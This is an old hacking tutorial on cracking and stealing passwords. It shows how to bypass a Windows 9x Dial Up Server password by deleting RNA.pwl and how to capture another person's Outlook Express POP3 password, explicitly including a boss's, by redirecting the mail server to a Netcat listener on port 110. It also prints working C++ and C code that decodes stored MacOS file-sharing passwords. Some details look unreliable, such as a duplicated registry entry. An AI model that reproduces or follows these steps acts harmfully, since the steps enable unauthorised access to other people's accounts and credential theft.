Password Cracking Decrypted 3
More Password Cracking Decrypted
Bypassing the Dial Up Server Password
Those of you who have used File Sharing must certainly have heard about the Dial Up Server utility. It too can be password protected. Now, say you have password protected the Dial Up Server and have forgotten the password, or someone has changed it, so that no one can dial into your system. What do you do?
Like all password protection features in Win 9x systems, this one too can easily be bypassed or changed. You do not need to know the old password to perform this hack. Simply delete the RNA.pwl file in the c:\windows directory, and the next time you use Dial Up Server you will find that it either asks you to enter a new password or does not ask for a password at all.
Cracking Outlook Express’s Password
After I released the first edition of Password Cracking Decrypted Revisited, I got a lot of mails from people asking questions like where Outlook Express stores the Dial Up Password and how to decrypt it, or how to get the Outlook Express password of their boss, who is on the same LAN. Well, this edition will, to a certain extent, answer all such questions.
Outlook Express, like Internet Explorer and a number of other Dial Up programs, provides the user with the 'Save Password' option. Although this option makes connecting to the net easy, it is really a stupid security loophole and leaves the user's password vulnerable to being cracked.
Outlook Express stores the Dial Up Networking or DUN Password in the registry, under the following key:
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
The above key actually has a number of sub keys, each of which stores information on one Internet Connection Account. The accounts (information and configuration details) are stored as 00000001 for the first account, 00000003 for the third, and so on.
Clicking on any of these account keys displays a number of DWORD, String and Binary values in the right pane. All these values store configuration details about how your Internet Connection Account works. However, the only value we are really interested in is POP3 Password2.
POP3 Password2 is the DWORD value which stores your Internet Connection Password. Actually, it is not only Outlook which uses this value, but the Internet Connection Wizard, under which both Outlook and Internet Explorer come.
Anyway, once I had found out the key used by Outlook Express, I racked my brains to figure out the algorithm to decrypt the stored value and get the plaintext password, but somewhere along the way, while experimenting for another of my tutorials, I found a much easier way to get the Outlook password. It requires no coding, no fancy C code editing, and no mathematics or algorithms.
************************
HACKING TRUTH: Common paths where some passwords are stored by various applications:
Outlook Express / Internet Explorer: HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
Panda Antivirus: HKEY_LOCAL_MACHINE\SOFTWARE\Panda Software\Panda Antivirus 6.0
Shares: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetDDE
Screen Saver: c:\windows\user.dat
Screen Saver: c:\windows\user.dat
************************
Well, before we go on to the actual process, let us understand what Outlook usually does while connecting to your mail server and downloading your email. When you click on Send and Receive, Outlook Express connects to Port 110 of your mail server, and the following POP command exchange takes place between your system and the POP daemon of the mail server:
+OK QPOP (version 2.53) at delhi1.mtnl.net.in starting.
USER abhijit
+OK Password required for abhijit
PASS abc
+OK abhijit has xx messages (yyyyy octets).
So, as soon as the daemon banner comes up, Outlook sends your username to the mail server, and once the 'Password required' message comes up, Outlook sends your password. This means that your password is being sent, exactly as shown above, to the remote system, and (I am sure almost all of you have guessed it by now) if this remote system has a port listener installed, then whoever runs it gets both the username and the password.
So what you have to do is:
1.) Change Outlook Express's Mail Server setting to point to a local machine, or any machine on which you are able to install and run a port listener.
2.) Connect to the Internet and click on Send/Receive just as you normally do, and voila, the listener gets the password for you. It is as simple as that.
This technique works with almost all email clients, including Netscape Messenger. It will not work only with those clients which ask for a password before you can change the mail server settings.
Where do I get a port listener? Well, you can get them, as well as all the other hacking utilities you need, from either http://www.anticode.com/ or packetstorm.securify.com.
Now, say you do not want to run the above program, or somehow do not like the idea of working with a port listener; then you can use a very interesting tool from L0pht.com called Netcat. This tool is really amazing, and before you read this manual further I suggest you read its documentation at l0pht.com, as I will not be discussing its various interesting options in this manual.
Anyway, the following command will create a simple port listener sort of utility, which listens on the specified port and records all data sent to it in the log file specified.
C:\>nc -l -p xx > file
Where xx is the port number to listen on, and file is the path of the log file where everything entered by the person who connected to port xx is recorded.
Note: The '-l' option listens for connections, while '-p xx' specifies the port to which you want Netcat to bind.
Now, in our case we want to bind Netcat to Port 110, listen for connections and record everything sent, so we use the following command:
C:\>nc -l -p 110 > log.txt
Well, actually, none of the methods described in this manual for stealing the passwords stored by software with the 'Save Password' feature are really needed. Almost all passwords, including Windows Login, Outlook Express, DUN and a few others, can easily be unmasked by using programs like Revelation.
Such a program basically converts the '*'s to plaintext. You can get it at: Revelation.
Cracking the MacOS Password
The following piece of code demonstrates the algorithm used by MacOS to encrypt passwords, and also how to decrypt such passwords. So enjoy!
/*
macfspwd.c
Written by Nate Pierce
[email protected]
http://happiness.dhs.org
July 14, 1999
Algorithm taken from:
http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=519
I have tested this on 8.6 and it works fine as well.
Compiled quite peachily on linux 2.2.10 with:
g++ -o macfspwd macfspwd.c
Run example (with debug on):
[user@server user]$ ./macfspwd 000406180D0A190B
Original string: 00 04 06 18 0d 0a 19 0b
1st XOR string: 00 00 04 06 18 0d 0a 19
2nd XOR string: 73 70 63 67 74 70 72 6b
Password is: stayaway
----- from the url above -----
The encryption algorithm in MacOS system is simple and the password can be easily decoded.
Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lies after owner's username. It's not so difficult to find it using a hex editor, even if we don't know owner's username.
Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1
AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh
where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)
aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH
An example:
Let's take 00 04 06 18 0D 0A 19 0B
00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; 02H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y
tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5.
copied verbatim from a post to bugtraq by Dawid adix Adamski <[email protected]> on July 10, 1999
----- snip -----
*/
#include <iostream>
#include <iomanip>
#include <cstring>
using namespace std;

/* comment this out if you don't want to see the extra info */
#define DEBUG

/* I think the max password length for file sharing is 8 characters */
#define PWLEN 8

/* returns the ASCII offset to subtract if q is 0-9, a-f, or A-F; 0 if q is not a hex digit */
int hexdig(char q);
/* returns value of 2 hex digits spliced together - hexint('f','f') will return 255 */
int hexint(char p, char q);

int main(int argc, char *argv[]) {
    int s1[PWLEN], s2[PWLEN], s3[PWLEN], i;
    char pwd[PWLEN + 1];
    const char *arg;

    /* first string - try 000406180D0A190B; must be exactly 16 hex digits */
    if (argc < 2 || strlen(argv[argc - 1]) != 2 * PWLEN) {
        cout << "\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
        return 1;
    }
    arg = argv[argc - 1];
    for (i = 0; i < 2 * PWLEN; i += 2) {
        if (hexdig(arg[i]) && hexdig(arg[i + 1]))
            s1[i / 2] = hexint(arg[i], arg[i + 1]);
        else {
            cout << "\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
            return 1;
        }
    }
    /* chunk in 2nd XOR string - the stored string shifted right by one byte */
    s2[0] = 0x0;
    for (i = 0; i < PWLEN - 1; i++)
        s2[i + 1] = s1[i];
    /* chunk in final XOR string - this is constant */
    s3[0] = 0x73; s3[1] = 0x70; s3[2] = 0x63; s3[3] = 0x67;
    s3[4] = 0x74; s3[5] = 0x70; s3[6] = 0x72; s3[7] = 0x6B;
#ifdef DEBUG
    cout << "Original string: ";
    for (i = 0; i < PWLEN; i++) cout << setw(2) << setfill('0') << hex << s1[i] << " ";
    cout << "\n1st XOR string: ";
    for (i = 0; i < PWLEN; i++) cout << setw(2) << setfill('0') << hex << s2[i] << " ";
    cout << "\n2nd XOR string: ";
    for (i = 0; i < PWLEN; i++) cout << setw(2) << setfill('0') << hex << s3[i] << " ";
    cout << endl;
#endif
    /* each plaintext byte = stored byte ^ previous stored byte ^ constant */
    cout << "Password is: ";
    for (i = 0; i < PWLEN; i++) pwd[i] = s1[i] ^ s2[i] ^ s3[i];
    pwd[PWLEN] = 0x0;
    cout << pwd << endl;
    return 0;
}

int hexdig(char q) {
    if (q > 47 && q < 58) return 48;   /* '0'-'9' */
    if (q > 64 && q < 71) return 55;   /* 'A'-'F' */
    if (q > 96 && q < 103) return 87;  /* 'a'-'f' */
    return 0;
}

int hexint(char p, char q) {
    return 16 * (p - hexdig(p)) + (q - hexdig(q));
}
-------------------------
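The XOR chain in the post above uses only the stored bytes and a fixed pad, so anyone holding the Users & Groups file can reverse it: it is an encoding, not real encryption. As an added example (not the manual's or Nate Pierce's code; the function names are mine), here is a C version of both directions, with the encoder included to show that passwords shorter than 8 characters are NUL-padded, which is what the "yellow" and "owner" samples imply.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define PWLEN 8

/* Constant pad from the bugtraq post quoted above: 73 70 63 67 74 70 72 6B */
static const uint8_t PAD[PWLEN] = {0x73, 0x70, 0x63, 0x67, 0x74, 0x70, 0x72, 0x6B};

/* Decode: plain[i] = enc[i] ^ enc[i-1] ^ PAD[i], with enc[-1] taken as 00.
 * Only the stored bytes and the fixed pad are involved, so no key is needed. */
void macfs_decode(const uint8_t enc[PWLEN], char out[PWLEN + 1]) {
    uint8_t prev = 0;
    for (int i = 0; i < PWLEN; i++) {
        out[i] = (char)(enc[i] ^ prev ^ PAD[i]);
        prev = enc[i];
    }
    out[PWLEN] = '\0';
}
/* Encode (the inverse): enc[i] = plain[i] ^ enc[i-1] ^ PAD[i]. Passwords shorter
 * than 8 bytes are NUL-padded, which reproduces the "yellow" and "owner" samples. */
void macfs_encode(const char *pw, uint8_t enc[PWLEN]) {
    uint8_t prev = 0;
    size_t n = strlen(pw);
    for (int i = 0; i < PWLEN; i++) {
        uint8_t p = ((size_t)i < n) ? (uint8_t)pw[i] : 0;
        enc[i] = p ^ prev ^ PAD[i];
        prev = enc[i];
    }
}
/* Parse exactly 16 hex digits into 8 bytes; returns 0 on success, -1 on bad input. */
int parse_hex16(const char *s, uint8_t out[PWLEN]) {
    if (strlen(s) != 2 * PWLEN) return -1;
    for (int i = 0; i < 2 * PWLEN; i++) {
        char c = s[i];
        int v = (c >= '0' && c <= '9') ? c - '0' : (c >= 'A' && c <= 'F') ? c - 'A' + 10
              : (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
        if (v < 0) return -1;
        out[i / 2] = (i % 2 == 0) ? (uint8_t)(v << 4) : (uint8_t)(out[i / 2] | v);
    }
    return 0;
}
int main(void) {
    uint8_t enc[PWLEN]; char pw[PWLEN + 1];
    /* the post's first sample, 00 04 06 18 0D 0A 19 0B, decodes to "stayaway" */
    if (parse_hex16("000406180D0A190B", enc) == 0) { macfs_decode(enc, pw); printf("%s\n", pw); }
    return 0;
}
```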
Well, that is all for now. I will update this manual explaining how to crack more passwords very soon, so hang in there.